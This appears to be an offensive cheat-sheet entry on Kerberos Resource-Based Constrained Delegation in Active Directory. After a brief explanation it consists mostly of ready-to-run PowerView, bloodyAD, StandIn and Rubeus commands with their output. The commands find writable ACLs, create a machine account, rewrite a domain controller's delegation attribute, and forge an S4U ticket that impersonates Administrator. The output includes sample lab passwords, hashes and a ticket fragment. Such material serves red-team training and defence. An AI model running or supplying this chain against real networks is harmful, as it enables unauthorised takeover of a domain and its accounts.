Kerberos Delegation - Resource Based Constrained Delegation
Resource-based Constrained Delegation was introduced in Windows Server 2012.
The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
-
Import Powermad and Powerview
-
Get user SID
$AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} $ACE ConvertFrom-SID $ACE.SecurityIdentifier # alternative (Windows/Linux) bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get writable --otype COMPUTER --detail | egrep -i 'distinguishedName|msds-allowedtoactonbehalfofotheridentity'
-
Abuse MachineAccountQuota to create a computer account and set an SPN for it
-
Rewrite DC's AllowedToActOnBehalfOfOtherIdentity properties
$ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 $Descriptor.DiscretionaryAcl # alternative (Windows/Linux) # use 'remove' instead of 'add' after exploit bloodyAD --host 10.1.0.4 -u user -p 'totoTOTOtoto1234*' -d crash.lab add rbcd 'dc01-ww2$' 'swktest$'
# alternative $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} # alternative StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
-
Use Rubeus to get hash from password
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan [*] Input password : Weakest123* [*] Input username : swktest$ [*] Input domain : factory.lan [*] Salt : FACTORY.LANswktest [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 [*] des_cbc_md5 : BA297CFD07E62A5E
-
Impersonate domain admin using our newly created machine account
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' [*] Sending S4U2proxy request [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE LmZhY3RvcnkubGFu [*] Action: Import Ticket [+] Ticket successfully imported!